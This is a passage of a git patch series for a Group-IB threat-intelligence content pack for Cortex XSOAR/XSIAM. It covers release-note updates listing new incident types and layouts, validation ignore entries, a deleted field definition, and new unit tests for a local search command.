+<~XSIAM> (Available from Cortex XSIAM 2.0).
+<~XSOAR> (Available from Cortex XSOAR 6.10.0).
+##### New: GIB Attacks Phishing Kit
+
+- New: Added a new incident type- GIB Attacks Phishing Kit that support new collections
+<~XSIAM> (Available from Cortex XSIAM 2.0).
+<~XSOAR> (Available from Cortex XSOAR 6.10.0).
+##### New: GIB Malware
+
+- New: Added a new incident type- GIB Malware that support new collections
+<~XSIAM> (Available from Cortex XSIAM 2.0).
+<~XSOAR> (Available from Cortex XSOAR 6.10.0).
+##### New: GIB Nation-State Cybercriminals Threat
+
+- New: Added a new incident type- GIB Nation-State Cybercriminals Threat that support new collections
+<~XSIAM> (Available from Cortex XSIAM 2.0).
+<~XSOAR> (Available from Cortex XSOAR 6.10.0).
+##### New: GIB Compromised Account Group
+
+- New: Added a new incident type- GIB Compromised Account Group that support new collections
+<~XSIAM> (Available from Cortex XSIAM 2.0).
+<~XSOAR> (Available from Cortex XSOAR 6.10.0).
+##### GIB Compromised Card
+
+- Updated the GIB Compromised Card incident type to support new collections.
+##### New: GIB Compromised Mule
+
+- New: Added a new incident type- GIB Compromised Mule that support new collections
+<~XSIAM> (Available from Cortex XSIAM 2.0).
+<~XSOAR> (Available from Cortex XSOAR 6.10.0).
+##### New: GIB Suspicious IP TOR Node
+
+- New: Added a new incident type- GIB Suspicious IP TOR Node that support new collections
+<~XSIAM> (Available from Cortex XSIAM 2.0).
+<~XSOAR> (Available from Cortex XSOAR 6.10.0).
+##### New: GIB Nation-State Cybercriminals Threat Actor
+
+- New: Added a new incident type- GIB Nation-State Cybercriminals Threat Actor that support new collections
+<~XSIAM> (Available from Cortex XSIAM 2.0).
+<~XSOAR> (Available from Cortex XSOAR 6.10.0).
+##### New: GIB Suspicious IP Socks Proxy
+
+- New: Added a new incident type- GIB Suspicious IP Socks Proxy that support new collections
+<~XSIAM> (Available from Cortex XSIAM 2.0).
+<~XSOAR> (Available from Cortex XSOAR 6.10.0).
+##### GIB Targeted Malware
+
+- Updated the GIB Targeted Malware incident type to support new collections.
+##### GIB Brand Protection Phishing
+
+- Updated the GIB Brand Protection Phishing incident type to support new collections.
+##### GIB Compromised Account
+
+- Updated the GIB Compromised Account incident type to support new collections.
+##### New: GIB Malware CNC
+
+- New: Added a new incident type- GIB Malware CNC that support new collections
+<~XSIAM> (Available from Cortex XSIAM 2.0).
+<~XSOAR> (Available from Cortex XSOAR 6.10.0).
+##### New: GIB Attacks DDOS
+
+- New: Added a new incident type- GIB Attacks DDOS that support new collections
+<~XSIAM> (Available from Cortex XSIAM 2.0).
+<~XSOAR> (Available from Cortex XSOAR 6.10.0).
+##### New: GIB Suspicious IP Scanner
+
+- New: Added a new incident type- GIB Suspicious IP Scanner that support new collections
+<~XSIAM> (Available from Cortex XSIAM 2.0).
+<~XSOAR> (Available from Cortex XSOAR 6.10.0).
+##### New: GIB Compromised Card Group
+
+- New: Added a new incident type- GIB Compromised Card Group that support new collections
+<~XSIAM> (Available from Cortex XSIAM 2.0).
+<~XSOAR> (Available from Cortex XSOAR 6.10.0).
+##### New: GIB Suspicious IP Open Proxy
+
+- New: Added a new incident type- GIB Suspicious IP Open Proxy that support new collections
+<~XSIAM> (Available from Cortex XSIAM 2.0).
+<~XSOAR> (Available from Cortex XSOAR 6.10.0).
+##### New: GIB Suspicious IP VPN
+
+- New: Added a new incident type- GIB Suspicious IP VPN that support new collections
+<~XSIAM> (Available from Cortex XSIAM 2.0).
+<~XSOAR> (Available from Cortex XSOAR 6.10.0).
+##### New: GIB APT Threat
+
+- New: Added a new incident type- GIB APT Threat that support new collections
+<~XSIAM> (Available from Cortex XSIAM 2.0).
+<~XSOAR> (Available from Cortex XSOAR 6.10.0).
+##### New: GIB Cybercriminal Threat
+
+- New: Added a new incident type- GIB Cybercriminal Threat that support new collections
+<~XSIAM> (Available from Cortex XSIAM 2.0).
+<~XSOAR> (Available from Cortex XSOAR 6.10.0).
+##### New: GIB Attacks Phishing Group
+
+- New: Added a new incident type- GIB Attacks Phishing Group that support new collections
+<~XSIAM> (Available from Cortex XSIAM 2.0).
+<~XSOAR> (Available from Cortex XSOAR 6.10.0).
+##### GIB OSI Git Leak
+
+- Updated the GIB OSI Git Leak incident type to support new collections.
+##### GIB Brand Protection Phishing Kit
+
+- Updated the GIB Brand Protection Phishing Kit incident type to support new collections.
+##### GIB Data Breach
+
+- Updated the GIB Data Breach incident type to support new collections.
+##### GIB OSI Public Leak
+
+- Updated the GIB OSI Public Leak incident type to support new collections.
+##### New: GIB OSI Vulnerability
+
+- New: Added a new incident type- GIB OSI Vulnerability that support new collections
+<~XSIAM> (Available from Cortex XSIAM 2.0).
+<~XSOAR> (Available from Cortex XSOAR 6.10.0).
+##### New: GIB Attacks Deface
+
+- New: Added a new incident type- GIB Attacks Deface that support new collections
+<~XSIAM> (Available from Cortex XSIAM 2.0).
+<~XSOAR> (Available from Cortex XSOAR 6.10.0).
 #### Indicator Fields
-- **GIB ID**
-- **GIB Threat Actor Name**
-- **GIB Malware Name**
-- **GIB Reliability**
-- **GIB Collection**
-- **GIB Threat Actor ID**
-- **GIB Severity**
-- **GIB Threat Actor is APT**
-- **GIB Proxy Anonymous**
-- New: **GIB Hash**
-- **GIB Credibility**
-- **GIB Admiralty Code**
+##### New: GIB Hash
+
+- New: Added a new indicator field- GIB Hash that support new collections
+<~XSIAM> (Available from Cortex XSIAM 2.0).
+<~XSOAR> (Available from Cortex XSOAR 6.10.0).
+##### GIB Threat Actor is APT
+
+- Updated the GIB Threat Actor is APT indicator field to support new collections.
+##### GIB Admiralty Code
+
+- Updated the GIB Admiralty Code indicator field to support new collections.
+##### GIB Proxy Anonymous
+
+- Updated the GIB Proxy Anonymous indicator field to support new collections.
+##### GIB Threat Actor Name
+
+- Updated the GIB Threat Actor Name indicator field to support new collections.
+##### GIB Collection
+
+- Updated the GIB Collection indicator field to support new collections.
+##### GIB Severity
+
+- Updated the GIB Severity indicator field to support new collections.
+##### GIB Reliability
+
+- Updated the GIB Reliability indicator field to support new collections.
+##### GIB ID
+
+- Updated the GIB ID indicator field to support new collections.
+##### GIB Credibility
+
+- Updated the GIB Credibility indicator field to support new collections.
+##### GIB Threat Actor ID
+
+- Updated the GIB Threat Actor ID indicator field to support new collections.
+##### GIB Malware Name
+
+- Updated the GIB Malware Name indicator field to support new collections.
 #### Indicator Types
-- **GIB Victim IP**
-- **GIB Compromised IMEI**
-- **GIB Compromised Mule**
+##### GIB Compromised Mule
+
+- Updated the %%UPDATE_CONTENT_ITEM_NAME%%. indicator type to support new collections.
+##### GIB Victim IP
+
+- Updated the %%UPDATE_CONTENT_ITEM_NAME%%. indicator type to support new collections.
+##### GIB Compromised IMEI
+
+- Updated the %%UPDATE_CONTENT_ITEM_NAME%%. indicator type to support new collections.
 #### Integrations
 ##### Group-IB Threat Intelligence
-- Completely updated the code, the main work with API is rewritten to use the library
+- Added support for **Hunting Rules** parameter that to enable the collection of data using hunting rules, please select this parameter.
+- Deleted the **gibtia-get-malware-targeted-malware-info** command.
+- Deleted the **gibtia-get-compromised-card-info** command.
+- Deleted the **gibtia-get-phishing-kit-info** command.
+- Deleted the **gibtia-get-phishing-info** command.
+- Deleted the **gibtia-get-compromised-imei-info** command.
+- Added support for **gibtia-get-suspicious-ip-vpn-info** command that command performs group ib event lookup in suspicious_ip/vpn collection by provided id.
+- Added support for **gibtia-get-suspicious-ip-scanner-info** command that command performs group ib event lookup in suspicious_ip/scanner collection by provided id.
+- Added support for **gibtia-get-phishing-group-info** command that command performs group ib event lookup in attacks/phishing_group collection by provided id.
+- Added support for **gibtia-get-compromised-card-group-info** command that command performs group ib event lookup in compromised/bank_card_group collection by provided id.
+- Added support for **gibtia-get-malware-malware-info** command that command performs group ib event lookup in malware/malware collection by provided id.
 - Updated the Docker image to: *demisto/vendors-sdk:1.0.0.2073752*.
+
 ##### Group-IB Threat Intelligence Feed
-- Completely updated the code, the main work with API is rewritten to use the library
+- Updated the Group-IB Threat Intelligence & Attribution Feed integration to support new collections.
 - Updated the Docker image to: *demisto/vendors-sdk:1.0.0.2073752*.
+
 #### Layouts
-##### GIB OSI Public Leak Layout
+##### GIB Compromised IMEI Layout
-- New layouts for new collections have been added, as well as old layouts have been modified
+- Updated the GIB Compromised IMEI Layout layout to support new collections.
+##### New: GIB Cybercriminal Threat Layout
-##### New: GIB Suspicious IP Open Proxy Layout
+- New: Added a new layout- GIB Cybercriminal Threat Layout that Layout for GIB Cybercriminal Threat
+<~XSIAM> (Available from Cortex XSIAM 2.0).
+<~XSOAR> (Available from Cortex XSOAR 6.10.0).
+##### GIB Compromised Card Layout
-- New: New layouts for new collections have been added, as well as old layouts have been modified (Available from Cortex XSOAR 6.10.0).
-##### GIB Brand Protection Phishing Kit Layout
+- Updated the GIB Compromised Card Layout layout to support new collections.
+##### New: GIB Cybercriminal Threat Actor Layout
-- New layouts for new collections have been added, as well as old layouts have been modified
-##### GIB Victim IP Layout
+- New: Added a new layout- GIB Cybercriminal Threat Actor Layout that Layout for GIB Cybercriminal Threat Actor
+<~XSIAM> (Available from Cortex XSIAM 2.0).
+<~XSOAR> (Available from Cortex XSOAR 6.10.0).
+##### New: GIB Suspicious IP VPN Layout
-- New layouts for new collections have been added, as well as old layouts have been modified
+- New: Added a new layout- GIB Suspicious IP VPN Layout that Layout for GIB Suspicious IP VPN
+<~XSIAM> (Available from Cortex XSIAM 2.0).
+<~XSOAR> (Available from Cortex XSOAR 6.10.0).
 ##### New: GIB Attacks Phishing Group Layout
-- New: New layouts for new collections have been added, as well as old layouts have been modified (Available from Cortex XSOAR 6.10.0).
-##### New: GIB Nation-State Cybercriminals Threat Layout
-
-- New: New layouts for new collections have been added, as well as old layouts have been modified (Available from Cortex XSOAR 6.10.0).
-##### GIB Compromised Mule Layout
+- New: Added a new layout- GIB Attacks Phishing Group Layout that Layout for GIB Attacks Phishing Group
+<~XSIAM> (Available from Cortex XSIAM 2.0).
+<~XSOAR> (Available from Cortex XSOAR 6.10.0).
+##### New: GIB Attacks Deface Layout
-- New layouts for new collections have been added, as well as old layouts have been modified
-##### GIB Compromised Account Layout
+- New: Added a new layout- GIB Attacks Deface Layout that Layout for GIB Attacks Deface
+<~XSIAM> (Available from Cortex XSIAM 2.0).
+<~XSOAR> (Available from Cortex XSOAR 6.10.0).
+##### New: GIB Attacks Phishing Kit Layout
-- New layouts for new collections have been added, as well as old layouts have been modified
-##### New: GIB Attacks DDOS Layout
+- New: Added a new layout- GIB Attacks Phishing Kit Layout that Layout for GIB Attacks Phishing Kit
+<~XSIAM> (Available from Cortex XSIAM 2.0).
+<~XSOAR> (Available from Cortex XSOAR 6.10.0).
+##### GIB Brand Protection Phishing Kit Layout
-- New: New layouts for new collections have been added, as well as old layouts have been modified (Available from Cortex XSOAR 6.10.0).
-##### GIB Targeted Malware Layout
+- Updated the GIB Brand Protection Phishing Kit Layout layout to support new collections.
+##### New: GIB Nation-State Cybercriminals Threat Actor Layout
-- New layouts for new collections have been added, as well as old layouts have been modified
-##### New: GIB Attacks Phishing Kit Layout
+- New: Added a new layout- GIB Nation-State Cybercriminals Threat Actor Layout that Layout for Nation-State Cybercriminals Threat Actor
+<~XSIAM> (Available from Cortex XSIAM 2.0).
+<~XSOAR> (Available from Cortex XSOAR 6.10.0).
+##### GIB Data Breach Layout
-- New: New layouts for new collections have been added, as well as old layouts have been modified (Available from Cortex XSOAR 6.10.0).
-##### New: GIB Suspicious IP Socks Proxy Layout
+- Updated the GIB Data Breach Layout layout to support new collections.
+##### New: GIB OSI Vulnerability Layout
-- New: New layouts for new collections have been added, as well as old layouts have been modified (Available from Cortex XSOAR 6.10.0).
+- New: Added a new layout- GIB OSI Vulnerability Layout that Layout for GIB OSI Vulnerability
+<~XSIAM> (Available from Cortex XSIAM 2.0).
+<~XSOAR> (Available from Cortex XSOAR 6.10.0).
 ##### New: GIB Compromised Card Group Layout
-- New: New layouts for new collections have been added, as well as old layouts have been modified (Available from Cortex XSOAR 6.10.0).
-##### New: GIB Cybercriminal Threat Actor Layout
+- New: Added a new layout- GIB Compromised Card Group Layout that Layout for GIB Compromised Card Group
+<~XSIAM> (Available from Cortex XSIAM 2.0).
+<~XSOAR> (Available from Cortex XSOAR 6.10.0).
+##### GIB OSI Git Leak Layout
-- New: New layouts for new collections have been added, as well as old layouts have been modified (Available from Cortex XSOAR 6.10.0).
-##### New: GIB Compromised Account Group Layout
+- Updated the GIB OSI Git Leak Layout layout to support new collections.
+##### New: GIB Attacks DDOS Layout
-- New: New layouts for new collections have been added, as well as old layouts have been modified (Available from Cortex XSOAR 6.10.0).
-##### GIB Data Breach Layout
+- New: Added a new layout- GIB Attacks DDOS Layout that Layout for GIB Attacks DDOS
+<~XSIAM> (Available from Cortex XSIAM 2.0).
+<~XSOAR> (Available from Cortex XSOAR 6.10.0).
+##### New: GIB Malware Layout
-- New layouts for new collections have been added, as well as old layouts have been modified
-##### GIB OSI Git Leak Layout
+- New: Added a new layout- GIB Malware Layout that Layout for GIB Malware
+<~XSIAM> (Available from Cortex XSIAM 2.0).
+<~XSOAR> (Available from Cortex XSOAR 6.10.0).
+##### GIB OSI Public Leak Layout
-- New layouts for new collections have been added, as well as old layouts have been modified
-##### New: GIB Malware CNC Layout
+- Updated the GIB OSI Public Leak Layout layout to support new collections.
+##### New: GIB Suspicious IP Scanner Layout
-- New: New layouts for new collections have been added, as well as old layouts have been modified (Available from Cortex XSOAR 6.10.0).
-##### New: GIB Cybercriminal Threat Layout
+- New: Added a new layout- GIB Suspicious IP Scanner Layout that Layout for GIB Suspicious IP Scanner
+<~XSIAM> (Available from Cortex XSIAM 2.0).
+<~XSOAR> (Available from Cortex XSOAR 6.10.0).
+##### GIB Targeted Malware Layout
-- New: New layouts for new collections have been added, as well as old layouts have been modified (Available from Cortex XSOAR 6.10.0).
-##### GIB Compromised Card Layout
+- Updated the GIB Targeted Malware Layout layout to support new collections.
+##### New: GIB Nation-State Cybercriminals Threat Layout
-- New layouts for new collections have been added, as well as old layouts have been modified
-##### New: GIB Attacks Deface Layout
+- New: Added a new layout- GIB Nation-State Cybercriminals Threat Layout that Layout for Nation-State Cybercriminals Threat
+<~XSIAM> (Available from Cortex XSIAM 2.0).
+<~XSOAR> (Available from Cortex XSOAR 6.10.0).
+##### New: GIB Compromised Account Group Layout
-- New: New layouts for new collections have been added, as well as old layouts have been modified (Available from Cortex XSOAR 6.10.0).
-##### New: GIB Nation-State Cybercriminals Threat Actor Layout
+- New: Added a new layout- GIB Compromised Account Group Layout that Layout for GIB Compromised Account Group
+<~XSIAM> (Available from Cortex XSIAM 2.0).
+<~XSOAR> (Available from Cortex XSOAR 6.10.0).
+##### New: GIB APT Threat Layout
-- New: New layouts for new collections have been added, as well as old layouts have been modified (Available from Cortex XSOAR 6.10.0).
-##### New: GIB Malware Layout
+- New: Added a new layout- GIB APT Threat Layout that Layout for GIB APT Threat
+<~XSIAM> (Available from Cortex XSIAM 2.0).
+<~XSOAR> (Available from Cortex XSOAR 6.10.0).
+##### New: GIB Malware CNC Layout
-- New: New layouts for new collections have been added, as well as old layouts have been modified (Available from Cortex XSOAR 6.10.0).
-##### New: GIB OSI Vulnerability Layout
+- New: Added a new layout- GIB Malware CNC Layout that Layout for GIB Malware CNC
+<~XSIAM> (Available from Cortex XSIAM 2.0).
+<~XSOAR> (Available from Cortex XSOAR 6.10.0).
+##### New: GIB Suspicious IP TOR Node Layout
-- New: New layouts for new collections have been added, as well as old layouts have been modified (Available from Cortex XSOAR 6.10.0).
-##### GIB Compromised IMEI Layout
+- New: Added a new layout- GIB Suspicious IP TOR Node Layout that Layout for GIB Suspicious IP TOR Node
+<~XSIAM> (Available from Cortex XSIAM 2.0).
+<~XSOAR> (Available from Cortex XSOAR 6.10.0).
+##### GIB Victim IP Layout
-- New layouts for new collections have been added, as well as old layouts have been modified
-##### New: GIB Suspicious IP VPN Layout
+- Updated the GIB Victim IP Layout layout to support new collections.
+##### New: GIB Suspicious IP Socks Proxy Layout
-- New: New layouts for new collections have been added, as well as old layouts have been modified (Available from Cortex XSOAR 6.10.0).
-##### GIB Brand Protection Phishing Layout
+- New: Added a new layout- GIB Suspicious IP Socks Proxy Layout that Layout for GIB Suspicious IP Socks Proxy
+<~XSIAM> (Available from Cortex XSIAM 2.0).
+<~XSOAR> (Available from Cortex XSOAR 6.10.0).
+##### New: GIB Suspicious IP Open Proxy Layout
-- New layouts for new collections have been added, as well as old layouts have been modified
-##### New: GIB Suspicious IP TOR Node Layout
+- New: Added a new layout- GIB Suspicious IP Open Proxy Layout that Layout for GIB Suspicious IP Open Proxy
+<~XSIAM> (Available from Cortex XSIAM 2.0).
+<~XSOAR> (Available from Cortex XSOAR 6.10.0).
+##### GIB Brand Protection Phishing Layout
-- New: New layouts for new collections have been added, as well as old layouts have been modified (Available from Cortex XSOAR 6.10.0).
-##### New: GIB APT Threat Layout
+- Updated the GIB Brand Protection Phishing Layout layout to support new collections.
+##### GIB Compromised Mule Layout
-- New: New layouts for new collections have been added, as well as old layouts have been modified (Available from Cortex XSOAR 6.10.0).
-##### New: GIB Suspicious IP Scanner Layout
+- Updated the GIB Compromised Mule Layout layout to support new collections.
+##### GIB Compromised Account Layout
-- New: New layouts for new collections have been added, as well as old layouts have been modified (Available from Cortex XSOAR 6.10.0).
+- Updated the GIB Compromised Account Layout layout to support new collections.
 #### Mappers
 ##### Group-IB Threat Intelligence (mapper)
-- Added and modified to support new collections
+- Updated the Group-IB Threat Intelligence (mapper) mapper to support new collections.
 #### Playbooks
 ##### Incident Postprocessing - Group-IB Threat Intelligence & Attribution
-- Added and modified post-processing for new collections
+- Updated the Incident Postprocessing - Group-IB Threat Intelligence & Attribution playbook to support new collections.
+
+#### PreProcess Rules
+
+##### New: gib_rule
+
+- New: Added a new preprocess rule- gib_rule that support new collections
+<~XSIAM> (Available from Cortex XSIAM 2.0).
+<~XSOAR> (Available from Cortex XSOAR 6.10.0).
 #### Scripts
-##### GIBIncidentUpdate
+##### GIBIncidentUpdateIncludingClosed
-- Added and modified to support new collections
+- Updated the GIBIncidentUpdateIncludingClosed script to support new collections.
 - Updated the Docker image to: *demisto/python3:3.12.8.1983910*.
-##### GIBIncidentUpdateIncludingClosed
-- Added and modified to support new collections
+##### GIBIncidentUpdate
+
+- Updated the GIBIncidentUpdate script to support new collections.
 - Updated the Docker image to: *demisto/python3:3.12.8.1983910*.
+
From bd9ae88226ea81d077768d1776a51f1f48b5cc2d Mon Sep 17 00:00:00 2001
From: Amichai
Date: Thu, 30 Jan 2025 13:19:48 +0200
Subject: [PATCH 6/9] Various fixes
---
 .../.pack-ignore | 51 ++++++++++++++++++-
 .../ReleaseNotes/2_0_0.md | 24 +++++++--
 2 files changed, 71 insertions(+), 4 deletions(-)
diff --git a/Packs/GroupIB_ThreatIntelligenceAttribution/.pack-ignore b/Packs/GroupIB_ThreatIntelligenceAttribution/.pack-ignore
index 84d337d0295e..14fd5c27d2dc 100644
--- a/Packs/GroupIB_ThreatIntelligenceAttribution/.pack-ignore
+++ b/Packs/GroupIB_ThreatIntelligenceAttribution/.pack-ignore
@@ -1,4 +1,4 @@
-[file:GroupIB_TIA.yml]
+[file:GroupIBTIA.yml]
 ignore=BA108,BA109,BC104,BC102,ST111,RM110
 [file:GroupIB_TIA_Feed.yml]
@@ -127,6 +127,9 @@ ignore=IF115
 [file:incidentfield-GIB_Emails.json]
 ignore=IF115
+[file:incidentfield-GIB_Email.json]
+ignore=GR103
+
 [file:incidentfield-GIB_Phishing_Domain_Expiration_Date.json]
 ignore=IF115
@@ -274,6 +277,49 @@ ignore=IF115
 [file:incidentfield-GIB_Date_Updated_At.json]
 ignore=GR103
+[file:incidentfield-GIB_Date_Expired.json]
+ignore=GR103
+
+[file:incidentfield-GIB_Phishing_Status.json]
+ignore=GR103
+
+
+[file:incidentfield-GIB_Screenshot.json]
+ignore=GR103
+
+[file:incidentfield-GIB_ID.json]
+ignore=GR103
+
+[file:incidentfield-GIB_Person.json]
+ignore=GR103
+
+[file:incidentfield-GIB_Name_Servers.json]
+ignore=GR103
+
+[file:incidentfield-GIB_HTML.json]
+ignore=GR103
+
+[file:incidentfield-GIB_Title.json]
+ignore=GR103
+
+[file:incidentfield-GIB_Date_Created.json]
+ignore=GR103
+
+[file:incidentfield-GIB_Favicon.json]
+ignore=GR103
+
+[file:incidentfield-GIB_Address.json]
+ignore=GR103
+
+[file:incidentfield-GIB_Phishing_Type.json]
+ignore=GR103
+
+[file:incidentfield-GIB_Phishing_Domain.json]
+ignore=GR103
+
+[file:incidentfield-GIB_Related_Indicators_Data.json]
+ignore=GR103
+
 [file:incidentfield-GIB_Scanner_Sources.json]
 ignore=BA116
@@ -352,3 +398,6 @@ ignore=LO107
 [file:layoutscontainer-GIB_Attacks_DDOS_Layout.json]
 ignore=LO107
+
+[file:layoutscontainer-GIB_Compromised_Account_Group_Layout.json]
+ignore=LO107
diff --git a/Packs/GroupIB_ThreatIntelligenceAttribution/ReleaseNotes/2_0_0.md b/Packs/GroupIB_ThreatIntelligenceAttribution/ReleaseNotes/2_0_0.md
index c8226c264d61..d4e40df691e5 100644
--- a/Packs/GroupIB_ThreatIntelligenceAttribution/ReleaseNotes/2_0_0.md
+++ b/Packs/GroupIB_ThreatIntelligenceAttribution/ReleaseNotes/2_0_0.md
@@ -974,6 +974,24 @@
 <~XSIAM> (Available from Cortex XSIAM 2.0).
 <~XSOAR> (Available from Cortex XSOAR 6.10.0).
+##### New: GIB Phishing Date Updated
+
+- New: Added a new incident field- GIB Phishing Date Updated that support new collections
+<~XSIAM> (Available from Cortex XSIAM 2.0).
+<~XSOAR> (Available from Cortex XSOAR 6.10.0).
+-
+- ##### New: GIB Nation-State Cybercriminals Threat Actor Aliases
+
+- New: Added a new incident field- GIB Nation-State Cybercriminals Threat Actor Aliases that support new collections
+<~XSIAM> (Available from Cortex XSIAM 2.0).
+<~XSOAR> (Available from Cortex XSOAR 6.10.0).
+-
+- ##### New: GIB Scanner Sources
+
+- New: Added a new incident field- GIB Scanner Sources that support new collections
+<~XSIAM> (Available from Cortex XSIAM 2.0).
+<~XSOAR> (Available from Cortex XSOAR 6.10.0).
+
 #### Incident Types
 ##### New: GIB Cybercriminal Threat Actor
@@ -1146,13 +1164,13 @@
 ##### GIB Compromised Mule
-- Updated the %%UPDATE_CONTENT_ITEM_NAME%%. indicator type to support new collections.
+- Updated the GIB Compromised Mule indicator type to support new collections.
 ##### GIB Victim IP
-- Updated the %%UPDATE_CONTENT_ITEM_NAME%%. indicator type to support new collections.
+- Updated the GIB Victim IP indicator type to support new collections.
 ##### GIB Compromised IMEI
-- Updated the %%UPDATE_CONTENT_ITEM_NAME%%. indicator type to support new collections.
+- Updated the GIB Compromised IMEI. indicator type to support new collections.
 #### Integrations
From 358e62ce046df61e9c3d756259bc947f9cb4d6b5 Mon Sep 17 00:00:00 2001
From: Amichai
Date: Thu, 30 Jan 2025 13:59:30 +0200
Subject: [PATCH 7/9] Various fixes
---
 .../.pack-ignore | 60 ++++++++++++++++
 .../incidentfield-CPE_Table.json | 33 ---------
 .../GroupIBTIA/GroupIBTIA_test.py | 69 ++++++++++++++++++-
 .../ReleaseNotes/2_0_0.md | 12 ++--
 4 files changed, 134 insertions(+), 40 deletions(-)
 delete mode 100644 Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-CPE_Table.json
diff --git a/Packs/GroupIB_ThreatIntelligenceAttribution/.pack-ignore b/Packs/GroupIB_ThreatIntelligenceAttribution/.pack-ignore
index 14fd5c27d2dc..a00ee9ea7a07 100644
--- a/Packs/GroupIB_ThreatIntelligenceAttribution/.pack-ignore
+++ b/Packs/GroupIB_ThreatIntelligenceAttribution/.pack-ignore
@@ -274,6 +274,66 @@ ignore=IF115
 [file:incidentfield-GIB_Downloaded_From_Table.json]
 ignore=IF115
+[file:incidentfield-GIB_Target_IP.json]
+ignore=IF115
+
+[file:incidentfield-GIB_Malware_Regions.json]
+ignore=IF115
+
+[file:incidentfield-GIB_Threat_Actor_Country.json]
+ignore=IF115
+
+[file:incidentfield-GIB_Malware_Short_Description.json]
+ignore=IF115
+
+[file:incidentfield-GIB_Target_City.json]
+ignore=IF115
+
+[file:incidentfield-GIB_Socks_Proxy_Source.json]
+ignore=IF115
+
+[file:incidentfield-GIB_Phishing_Date_Updated.json]
+ignore=IF115
+
+[file:incidentfield-GIB_Nation-State_Cybercriminals_Threat_Langs.json]
+ignore=IF115
+
+[file:incidentfield-GIB_GIT_Source.json]
+ignore=IF115
+
+[file:incidentfield-GIB_DDOS_Target_Category.json]
+ignore=IF115
+
+[file:incidentfield-GIB_Bulletin_Family.json]
+ignore=IF115
+
+[file:incidentfield-GIB_Extended_CVSS_Impact.json]
+ignore=IF115
+
+[file:incidentfield-GIB_DDOS_Target_ASN.json]
+ignore=IF115
+
+[file:incidentfield-GIB_Malware_Description.json]
+ignore=IF115
+
+[file:incidentfield-GIB_Mirror_Link.json]
+ignore=IF115
+
+[file:incidentfield-GIB_Vulnerability_Type.json]
+ignore=IF115
+
+[file:incidentfield-GIB_Cybercriminal_Threat_Actor_Reports_Table.json]
+ignore=IF115
+
+[file:incidentfield-GIB_Nation-State_Cybercriminals_Threat_Actor_CVE.json]
+ignore=IF115
+
+[file:incidentfield-GIB_Phishing_Kit_Table.json]
+ignore=IF115
+
+[file:incidentfield-GIB_Country_Code.json]
+ignore=IF115
+
 [file:incidentfield-GIB_Date_Updated_At.json]
 ignore=GR103
diff --git a/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-CPE_Table.json b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-CPE_Table.json
deleted file mode 100644
index d5f44228f276..000000000000
--- a/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-CPE_Table.json
+++ /dev/null
@@ -1,33 +0,0 @@
-{
- "associatedToAll": false,
- "associatedTypes": [
- "GIB OSI Vulnerability"
- ],
- "caseInsensitive": true,
- "cliName": "cpetable",
- "closeForm": true,
- "content": true,
- "editForm": true,
- "group": 0,
- "hidden": false,
- "id": "incident_cpetable",
- "isReadOnly": false,
- "locked": false,
- "name": "CPE Table",
- "neverSetAsRequired": false,
- "openEnded": false,
- "ownerOnly": false,
- "required": false,
- "sla": 0,
- "system": false,
- "systemAssociatedTypes": [
- "GIB OSI Vulnerability"
- ],
- "threshold": 72,
- "type": "markdown",
- "unmapped": false,
- "unsearchable": true,
- "useAsKpi": false,
- "version": -1,
- "fromVersion": "6.10.0"
-}
\ No newline at end of file
diff --git a/Packs/GroupIB_ThreatIntelligenceAttribution/Integrations/GroupIBTIA/GroupIBTIA_test.py b/Packs/GroupIB_ThreatIntelligenceAttribution/Integrations/GroupIBTIA/GroupIBTIA_test.py
index e40dad6752f3..437062fe3b5a 100644
--- a/Packs/GroupIB_ThreatIntelligenceAttribution/Integrations/GroupIBTIA/GroupIBTIA_test.py
+++ b/Packs/GroupIB_ThreatIntelligenceAttribution/Integrations/GroupIBTIA/GroupIBTIA_test.py
@@ -1,9 +1,14 @@
+from unittest.mock import patch, MagicMock
+
 import pytest
+
+from CommonServerPython import CommandResults
 from GroupIBTIA import (
 fetch_incidents_command,
 Client,
 main,
 get_available_collections_command,
+ local_search_command
 )
 from urllib3.exceptions import InsecureRequestWarning
 from urllib3 import disable_warnings as urllib3_disable_warnings
@@ -25,7 +30,6 @@
 # Disable insecure warnings
 urllib3_disable_warnings(InsecureRequestWarning)
-
 COLLECTION_NAMES = [
 "compromised/account_group",
 "compromised/bank_card_group",
@@ -202,3 +206,66 @@ def test_get_available_collections(mocker, single_session_fixture):
 assert result.outputs_prefix == "GIBTIA.OtherInfo"
 assert result.outputs_key_field == "collections"
 assert isinstance(result.outputs["collections"], list)
+
+
+@pytest.fixture
+def mock_client():
+    """Fixture to create a mock client."""
+    client = MagicMock()
+    client.poller.create_search_generator.return_value = []
+    return client
+
+
+@pytest.fixture
+def mock_common_helpers():
+    """Fixture to mock CommonHelpers functions."""
+    with patch("GroupIBTIA.CommonHelpers.validate_collections") as mock_validate, \
+        patch("GroupIBTIA.CommonHelpers.date_parse") as mock_date_parse:
+        mock_validate.return_value = None
+        mock_date_parse.side_effect = lambda date, arg_name: f"parsed_{date}" if date else None
+        yield mock_validate, mock_date_parse
+
+
+def test_local_search_command_no_results(mock_client, mock_common_helpers):
+    """
+    Given: A valid collection name and search query, with no results returned by the client.
+    When: The local_search_command function is executed.
+    Then: The function should return an empty list with appropriate formatting.
+    """
+    args = {"query": "test_query", "collection_name": "test_collection"}
+
+    result = local_search_command(mock_client, args)
+
+    assert isinstance(result, CommandResults)
+    assert result.outputs_prefix == "GIBTIA.search.local"
+    assert result.outputs_key_field == "id"
+    assert result.outputs == []
+    assert "Search results" in result.readable_output
+
+
+def test_local_search_command_with_results(mock_client, mock_common_helpers):
+    """
+    Given: A valid collection name, search query, and results returned by the client.
+    When: The local_search_command function is executed.
+    Then: The function should return a formatted list of search results.
